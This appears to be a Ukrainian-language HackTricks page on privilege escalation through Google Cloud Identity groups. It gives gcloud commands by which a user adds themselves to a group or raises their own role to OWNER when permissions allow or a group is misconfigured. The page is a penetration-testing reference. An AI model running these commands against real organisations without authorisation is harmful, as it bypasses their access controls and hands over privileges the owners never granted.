GCP - Cloudidentity Privesc

Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!

Інші способи підтримки HackTricks:

Cloudidentity

Для отримання додаткової інформації про службу cloudidentity перегляньте цю сторінку:

pageGCP - IAM, Principals & Org Policies Enum

Додайте себе до групи

Якщо ваш користувач має достатньо дозволів або група налаштована неправильно, він може зробити себе членом нової групи:

gcloud identity groups memberships add --group-email <email> --member-email <email> [--roles OWNER]
# If --roles isn't specified you will get MEMBER

Зміна членства в групі

Якщо ваш користувач має достатньо дозволів або група налаштована неправильно, він може зробити себе ВЛАСНИКОМ групи, до якої він належить:

# Check the current membership level
gcloud identity groups memberships describe --member-email <email> --group-email <email>

# If not OWNER try
gcloud identity groups memberships modify-membership-roles --group-email <email> --member-email <email> --add-roles=OWNER
Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!

Інші способи підтримати HackTricks:

Last updated